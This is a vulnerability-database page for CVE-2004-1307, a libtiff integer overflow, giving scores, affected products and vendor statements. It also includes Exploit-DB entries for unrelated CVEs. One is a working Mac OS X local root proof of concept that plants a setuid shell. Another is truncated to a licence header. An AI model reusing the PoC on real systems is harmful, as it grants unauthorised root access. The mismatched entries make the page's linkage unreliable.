CVE-2004-1307
published 2004-12-21CVE-2004-1307: Integer overflow in the TIFFFetchStripThing function in tif_dirread.c for libtiff 3.6.1 allows remote attackers to execute arbitrary code via a TIFF file with…
PriorityP336high7.5CVSS 2.0
AVNACLAuNCPIPAP
EPSS
6.34%
92.8th percentile
Integer overflow in the TIFFFetchStripThing function in tif_dirread.c for libtiff 3.6.1 allows remote attackers to execute arbitrary code via a TIFF file with the STRIPOFFSETS flag and a large number of strips, which causes a zero byte buffer to be allocated and leads to a heap-based buffer overflow.
Affected
57 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x | — | — |
| apple | mac_os_x_server | — | — |
| apple | mac_os_x_server | — | — |
| apple | mac_os_x_server | — | — |
| apple | mac_os_x_server | — | — |
| apple | mac_os_x_server | — | — |
| apple | mac_os_x_server | — | — |
| apple | mac_os_x_server | — | — |
| apple | mac_os_x_server | — | — |
| apple | mac_os_x_server | — | — |
| apple | mac_os_x_server | — | — |
| avaya | call_management_system_server | — | — |
| avaya | call_management_system_server | — | — |
| avaya | call_management_system_server | — | — |
| avaya | call_management_system_server | — | — |
| avaya | call_management_system_server | — | — |
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv7.5HIGH
vendor_debian7.5LOW
vendor_redhat5.0MEDIUM
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
security flaw
vendor_redhat·2004-12-21·CVSS 5.0
CVE-2004-1307 [MEDIUM] security flaw
security flaw
Integer overflow in the TIFFFetchStripThing function in tif_dirread.c for libtiff 3.6.1 allows remote attackers to execute arbitrary code via a TIFF file with the STRIPOFFSETS flag and a large number of strips, which causes a zero byte buffer to be allocated and leads to a heap-based buffer overflow.
Statement: This issue was resolved in all affected libtiff versions as shipped with Red Hat Enterprise Linux 2.1, 3, and 4 via a patch for CVE-2004-0886. For updates containing patches for CVE-2004-0886, see: https://rhn.redhat.com/errata/CVE-2004-0886.html
Debian
CVE-2004-1307: tiff - Integer overflow in the TIFFFetchStripThing function in tif_dirread.c for libtif...
vendor_debian·2004·CVSS 7.5
CVE-2004-1307 [HIGH] CVE-2004-1307: tiff - Integer overflow in the TIFFFetchStripThing function in tif_dirread.c for libtif...
Integer overflow in the TIFFFetchStripThing function in tif_dirread.c for libtiff 3.6.1 allows remote attackers to execute arbitrary code via a TIFF file with the STRIPOFFSETS flag and a large number of strips, which causes a zero byte buffer to be allocated and leads to a heap-based buffer overflow.
Scope: local
bookworm: resolved (fixed in 3.7.0)
bullseye: resolved (fixed in 3.7.0)
forky: resolved (fixed in 3.7.0)
sid: resolved (fixed in 3.7.0)
trixie: resolved (fixed in 3.7.0)
GHSA
GHSA-j2r4-vwhq-m2gg: Integer overflow in the TIFFFetchStripThing function in tif_dirread
ghsa_unreviewed·2022-04-29
CVE-2004-1307 [HIGH] GHSA-j2r4-vwhq-m2gg: Integer overflow in the TIFFFetchStripThing function in tif_dirread
Integer overflow in the TIFFFetchStripThing function in tif_dirread.c for libtiff 3.6.1 allows remote attackers to execute arbitrary code via a TIFF file with the STRIPOFFSETS flag and a large number of strips, which causes a zero byte buffer to be allocated and leads to a heap-based buffer overflow.
OSV
CVE-2004-1307: Integer overflow in the TIFFFetchStripThing function in tif_dirread
osv·2004-12-21·CVSS 7.5
CVE-2004-1307 [HIGH] CVE-2004-1307: Integer overflow in the TIFFFetchStripThing function in tif_dirread
Integer overflow in the TIFFFetchStripThing function in tif_dirread.c for libtiff 3.6.1 allows remote attackers to execute arbitrary code via a TIFF file with the STRIPOFFSETS flag and a large number of strips, which causes a zero byte buffer to be allocated and leads to a heap-based buffer overflow.
No detection rules found.
Exploit-DB
Apple Mac OSX Adobe Version Cue - Local Privilege Escalation
exploitdb·2004-12-08
CVE-2005-1307 Apple Mac OSX Adobe Version Cue - Local Privilege Escalation
Apple Mac OSX Adobe Version Cue - Local Privilege Escalation
---
Proof of concept:
haven:~ fintler$ cd ~
haven:~ fintler$ id
uid=502(fintler) gid=500(fintler) groups=500(fintler)
haven:~ fintler$ echo "cp /bin/sh /Users/$USER;chmod 4755
/Users/$USER/sh;chown root /Users/$USER/sh" > productname.sh
haven:~ fintler$ chmod 0755 ./productname.sh
haven:~ fintler$ ln -s /Applications/Adobe\ Version\ Cue/stopserver.sh .
haven:~ fintler$ ./stopserver.sh
Stopping ...
./stopserver.sh: line 21: ./tomcat/bin/shutdown.sh: No such file or directory
No matching processes belonging to you were found
haven:~ fintler$ ./sh
sh-2.05b# id
uid=502(fintler) euid=0(root) gid=500(fintler) groups=500(fintler)
sh-2.05b# whoami
root
sh-2.05b#
# milw0rm.com [2004-12-08]
Exploit-DB
Star Wars Battlefront 1.1 - Fake Players Denial of Service
exploitdb·2004-11-24
CVE-2004-1195 Star Wars Battlefront 1.1 - Fake Players Denial of Service
Star Wars Battlefront 1.1 - Fake Players Denial of Service
---
/*
Copyright 2004 Luigi Auriemma
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
http://www.gnu.org/licenses
http://lists.apple.com/archives/security-announce/2005/May/msg00001.htmlhttp://sunsolve.sun.com/search/document.do?assetkey=1-26-101677-1http://sunsolve.sun.com/search/document.do?assetkey=1-66-201072-1http://www.idefense.com/application/poi/display?id=173&type=vulnerabilities&flashstatus=truehttp://www.kb.cert.org/vuls/id/539110http://www.us-cert.gov/cas/techalerts/TA05-136A.htmlhttps://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11175http://lists.apple.com/archives/security-announce/2005/May/msg00001.htmlhttp://sunsolve.sun.com/search/document.do?assetkey=1-26-101677-1http://sunsolve.sun.com/search/document.do?assetkey=1-66-201072-1http://www.idefense.com/application/poi/display?id=173&type=vulnerabilities&flashstatus=truehttp://www.kb.cert.org/vuls/id/539110http://www.us-cert.gov/cas/techalerts/TA05-136A.htmlhttps://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11175
2004-12-21
Published